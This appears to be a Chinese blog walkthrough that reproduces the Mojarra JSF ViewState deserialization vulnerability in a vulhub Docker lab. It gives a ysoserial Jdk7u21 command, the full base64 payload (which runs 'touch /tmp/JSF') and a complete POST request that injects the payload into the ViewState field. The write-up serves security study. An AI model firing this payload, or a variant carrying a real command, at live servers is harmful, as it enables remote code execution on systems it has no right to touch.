Mojarra JSF ViewState 反序列化漏洞

声明

好好学习,天天向上

漏洞描述

JavaServer Faces (JSF) 是一种用于构建 Web 应用程序的标准,Mojarra是一个实现了JSF的框架。在其2.1.29-08、2.0.11-04版本之前,没有对JSF中的ViewState进行加密,进而导致攻击者可以构造恶意的序列化ViewState对象对服务器进行攻击。

影响范围

2.1.29-08前

2.0.11-04前

复现过程

这里使用2.1.28版本

使用vulhub

/app/vulhub-master/mojarra/jsf-viewstate-deserialization

使用docker启动

docker-compose build
docker-compose up -d

环境启动后,访问

http://192.168.239.129:8080

使用yso生成payload

java -jar ysoserial-master-SNAPSHOT.jar Jdk7u21 "touch /tmp/JSF" | gzip | base64 -w 0

生成的paylload

H4sIAAAAAAAAA61Wy28bRRj/xk5sxzjP5tlHmtKWPKC7zbMpjmjzIK2LQyKcphI+mPF6Ym+73t3uziYbJHrjD0ConLkAB8KhF1r1gFRxa7kgIYGKKsGFG3CokLjw+GZ3E0dJqN3SlXZn9nvN933zm2++zV+h3rag6ypdo5LDVU1Kq/o1VrhI7VKG8R+079+++WioNwTgWtBakQr4d+fev/nRndtjYeSb6wkAaDl3HsQTQquvKkZZsh1dMqyiRE2qlJjkUo3qkqpzZulUk1xb44rELepKy6xsapQzO4Vjw5XFe/rm56NhiKSgMafqBabzN51ynlkpaMqhgm5rjKeQ7mYhnstvcKYYBWZzCGezM1mI5BSN2vjblk0Lt2VctijPCloyDfU5nZYZMnfwMtxS9SIyW3OGw02HL1mGySyuCqOdvqCIXa7Qk64pYv0HH8fyFn7jr56OYvHHMyJhghdCeig7s/m4689IbPmngBz5+P7fd79C9gicjUMYXozCmSicjMJLBFpsZqlUW2GWrRr65dQcAXKJQOOsoduc6nyFag6r/6Lvw8cfPPr9NQKRKVVXOU7CA4MrBOpmMQsEmnEbmZ+vZZrXkNKWNhQ0S9E4/gfEOl5SbQIHMtzJLwc5XaIbmkELBBIpXWeWlzKGQuPpDdvwnZNNX8b2E3KBFoqM2yf2sZIk0OBt1qphlQlYA2nEhIyYkBETso8J2cOEvIUJ2cOEPLe4kMzuK13WKrK+P+q7zJIzwZRyzNtFqhc0ZiVFSmIFQ3HKiB8Cp55qeVQt+XYw/Jn/7wyB+OuuwkxBs6PQT+DTp8tHVQ8KvCzPLS9Mu6qdQhLlhlVdqaYcqoE5gYNn8YJANMglgennkcmM4VgKm1cFjBMBAiVxSBMQhxeiMEBg9BkAS+B8rTtiOTpXy0yeztsIcYVvWSLQ7hUL1ag47522s7Va3rK0jRYCR6vEgls0pWhBKWitVLW3fCejMIQ5Q8Hgn0DHwGB6j1gyAa/AqTi8DBKBJm44SqlP5mVTvpSZj8FpLBjMZQqB/oG9hXOnOSyRCsNKm8AKNyrMjWEFy3CqXFugZlB7DlciWlrHQjM6OTo8PD46PDY+OTFCoDf9JH4SjkEIKyd6hO9BqIcIjlFRcSHm0RAE+BVXkowjwbF+6DaQW55II34jHlGGJvwmfAFohkkcsSBCO0oJ5XP4hgVtt+KYp9jnMwNFMeuATo9PoAu6UaMH576PwuyhwGzKo+5jdtIzO+Qz9zV7GI6ghpj1wlFcvrJADAa3gz6BHCHV/BmESfoOyG3DX8L4lVue4oQXFBESfd76x6AVxziyQnAcWqDBuQ430BaQ77ZvqkPipuqIQlcUuqPQU+tNdf0X9bep8oXu53NThecNY8/NdLLqzYRatdSMgwSO12AKQ69AfTF/lSn/fearndsn4pjUjuOpXThu8/gHvG/7jt3tFLtrcqjDM2WZ6wRc+z0PE0eE/66EZVjavrArPZm71SOKmCWLrWoYtITH3N34uf9h3zctsw9CQNJAShy3o5KdQFJO6Wu4qTtLuGtihzgiusMta1TXDe7JSNPb0z2Kl+//0dzx4MYnIQilIVFmAjge0rBLa97RpWGhwV6ujm+Y2Oe17ukBveV3NbSoUh99eO/rzne+xaMxD3GxXfNY2Q1sOht4yWJ2ydAKrhn0uIn1mOh4Rfo4xFbH6TidOD0pTk7MXbOqZBQqj2u6/wIGxTWyiAsAAA==

在进行URL编码

H4sIAAAAAAAAA61Wy28bRRj%2fxk5sxzjP5tlHmtKWPKC7zbMpjmjzIK2LQyKcphI%2bmPF6Ym%2b73t3uziYbJHrjD0ConLkAB8KhF1r1gFRxa7kgIYGKKsGFG3CokLjw%2bGZ3E0dJqN3SlXZn9nvN933zm2%2b%2bzV%2bh3rag6ypdo5LDVU1Kq%2fo1VrhI7VKG8R%2b079%2b%2b%2bWioNwTgWtBakQr4d%2bfev%2fnRndtjYeSb6wkAaDl3HsQTQquvKkZZsh1dMqyiRE2qlJjkUo3qkqpzZulUk1xb44rELepKy6xsapQzO4Vjw5XFe%2frm56NhiKSgMafqBabzN51ynlkpaMqhgm5rjKeQ7mYhnstvcKYYBWZzCGezM1mI5BSN2vjblk0Lt2VctijPCloyDfU5nZYZMnfwMtxS9SIyW3OGw02HL1mGySyuCqOdvqCIXa7Qk64pYv0HH8fyFn7jr56OYvHHMyJhghdCeig7s%2fm4689IbPmngBz5%2bP7fd79C9gicjUMYXozCmSicjMJLBFpsZqlUW2GWrRr65dQcAXKJQOOsoduc6nyFag6r%2f6Lvw8cfPPr9NQKRKVVXOU7CA4MrBOpmMQsEmnEbmZ%2bvZZrXkNKWNhQ0S9E4%2fgfEOl5SbQIHMtzJLwc5XaIbmkELBBIpXWeWlzKGQuPpDdvwnZNNX8b2E3KBFoqM2yf2sZIk0OBt1qphlQlYA2nEhIyYkBETso8J2cOEvIUJ2cOEPLe4kMzuK13WKrK%2bP%2bq7zJIzwZRyzNtFqhc0ZiVFSmIFQ3HKiB8Cp55qeVQt%2bXYw%2fJn%2f7wyB%2bOuuwkxBs6PQT%2bDTp8tHVQ8KvCzPLS9Mu6qdQhLlhlVdqaYcqoE5gYNn8YJANMglgennkcmM4VgKm1cFjBMBAiVxSBMQhxeiMEBg9BkAS%2bB8rTtiOTpXy0yeztsIcYVvWSLQ7hUL1ag47522s7Va3rK0jRYCR6vEgls0pWhBKWitVLW3fCejMIQ5Q8Hgn0DHwGB6j1gyAa%2fAqTi8DBKBJm44SqlP5mVTvpSZj8FpLBjMZQqB%2foG9hXOnOSyRCsNKm8AKNyrMjWEFy3CqXFugZlB7DlciWlrHQjM6OTo8PD46PDY%2bOTFCoDf9JH4SjkEIKyd6hO9BqIcIjlFRcSHm0RAE%2bBVXkowjwbF%2b6DaQW55II34jHlGGJvwmfAFohkkcsSBCO0oJ5XP4hgVtt%2bKYp9jnMwNFMeuATo9PoAu6UaMH576PwuyhwGzKo%2b5jdtIzO%2bQz9zV7GI6ghpj1wlFcvrJADAa3gz6BHCHV%2fBmESfoOyG3DX8L4lVue4oQXFBESfd76x6AVxziyQnAcWqDBuQ430BaQ77ZvqkPipuqIQlcUuqPQU%2btNdf0X9bep8oXu53NThecNY8%2fNdLLqzYRatdSMgwSO12AKQ69AfTF%2flSn%2ffearndsn4pjUjuOpXThu8%2fgHvG%2f7jt3tFLtrcqjDM2WZ6wRc%2bz0PE0eE%2f66EZVjavrArPZm71SOKmCWLrWoYtITH3N34uf9h3zctsw9CQNJAShy3o5KdQFJO6Wu4qTtLuGtihzgiusMta1TXDe7JSNPb0z2Kl%2b%2f%2f0dzx4MYnIQilIVFmAjge0rBLa97RpWGhwV6ujm%2bY2Oe17ukBveV3NbSoUh99eO%2frzne%2bxaMxD3GxXfNY2Q1sOht4yWJ2ydAKrhn0uIn1mOh4Rfo4xFbH6TidOD0pTk7MXbOqZBQqj2u6%2fwIGxTWyiAsAAA%3D%3D

然后首页,提交表单,修改其中javax.faces.ViewState字段的值为上述Payload

POST /index.xhtml HTTP/1.1
Host: 192.168.239.129:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.129:8080/
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 1923

j_idt6=j_idt6&j_idt6%3Aj_idt7=aaaa&j_idt6%3Aj_idt8=Hello&javax.faces.ViewState=H4sIAAAAAAAAA61Wy28bRRj%2fxk5sxzjP5tlHmtKWPKC7zbMpjmjzIK2LQyKcphI%2bmPF6Ym%2b73t3uziYbJHrjD0ConLkAB8KhF1r1gFRxa7kgIYGKKsGFG3CokLjw%2bGZ3E0dJqN3SlXZn9nvN933zm2%2b%2bzV%2bh3rag6ypdo5LDVU1Kq%2fo1VrhI7VKG8R%2b079%2b%2b%2bWioNwTgWtBakQr4d%2bfev%2fnRndtjYeSb6wkAaDl3HsQTQquvKkZZsh1dMqyiRE2qlJjkUo3qkqpzZulUk1xb44rELepKy6xsapQzO4Vjw5XFe%2frm56NhiKSgMafqBabzN51ynlkpaMqhgm5rjKeQ7mYhnstvcKYYBWZzCGezM1mI5BSN2vjblk0Lt2VctijPCloyDfU5nZYZMnfwMtxS9SIyW3OGw02HL1mGySyuCqOdvqCIXa7Qk64pYv0HH8fyFn7jr56OYvHHMyJhghdCeig7s%2fm4689IbPmngBz5%2bP7fd79C9gicjUMYXozCmSicjMJLBFpsZqlUW2GWrRr65dQcAXKJQOOsoduc6nyFag6r%2f6Lvw8cfPPr9NQKRKVVXOU7CA4MrBOpmMQsEmnEbmZ%2bvZZrXkNKWNhQ0S9E4%2fgfEOl5SbQIHMtzJLwc5XaIbmkELBBIpXWeWlzKGQuPpDdvwnZNNX8b2E3KBFoqM2yf2sZIk0OBt1qphlQlYA2nEhIyYkBETso8J2cOEvIUJ2cOEPLe4kMzuK13WKrK%2bP%2bq7zJIzwZRyzNtFqhc0ZiVFSmIFQ3HKiB8Cp55qeVQt%2bXYw%2fJn%2f7wyB%2bOuuwkxBs6PQT%2bDTp8tHVQ8KvCzPLS9Mu6qdQhLlhlVdqaYcqoE5gYNn8YJANMglgennkcmM4VgKm1cFjBMBAiVxSBMQhxeiMEBg9BkAS%2bB8rTtiOTpXy0yeztsIcYVvWSLQ7hUL1ag47522s7Va3rK0jRYCR6vEgls0pWhBKWitVLW3fCejMIQ5Q8Hgn0DHwGB6j1gyAa%2fAqTi8DBKBJm44SqlP5mVTvpSZj8FpLBjMZQqB%2foG9hXOnOSyRCsNKm8AKNyrMjWEFy3CqXFugZlB7DlciWlrHQjM6OTo8PD46PDY%2bOTFCoDf9JH4SjkEIKyd6hO9BqIcIjlFRcSHm0RAE%2bBVXkowjwbF%2b6DaQW55II34jHlGGJvwmfAFohkkcsSBCO0oJ5XP4hgVtt%2bKYp9jnMwNFMeuATo9PoAu6UaMH576PwuyhwGzKo%2b5jdtIzO%2bQz9zV7GI6ghpj1wlFcvrJADAa3gz6BHCHV%2fBmESfoOyG3DX8L4lVue4oQXFBESfd76x6AVxziyQnAcWqDBuQ430BaQ77ZvqkPipuqIQlcUuqPQU%2btNdf0X9bep8oXu53NThecNY8%2fNdLLqzYRatdSMgwSO12AKQ69AfTF%2flSn%2ffearndsn4pjUjuOpXThu8%2fgHvG%2f7jt3tFLtrcqjDM2WZ6wRc%2bz0PE0eE%2f66EZVjavrArPZm71SOKmCWLrWoYtITH3N34uf9h3zctsw9CQNJAShy3o5KdQFJO6Wu4qTtLuGtihzgiusMta1TXDe7JSNPb0z2Kl%2b%2f%2f0dzx4MYnIQilIVFmAjge0rBLa97RpWGhwV6ujm%2bY2Oe17ukBveV3NbSoUh99eO%2frzne%2bxaMxD3GxXfNY2Q1sOht4yWJ2ydAKrhn0uIn1mOh4Rfo4xFbH6TidOD0pTk7MXbOqZBQqj2u6%2fwIGxTWyiAsAAA%3D%3D

在这里插入图片描述

在这里插入图片描述

关闭镜像(每次用完后关闭)

docker-compose down

docker-compose常用命令

拉镜像(进入到vulhub某个具体目录后)

docker-compose build
docker-compose up -d

镜像查询(查到的第一列就是ID值)

docker ps -a

进入指定镜像里面(根据上一条查出的ID进入)

docker exec -it ID /bin/bash

关闭镜像(每次用完后关闭)

docker-compose down
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值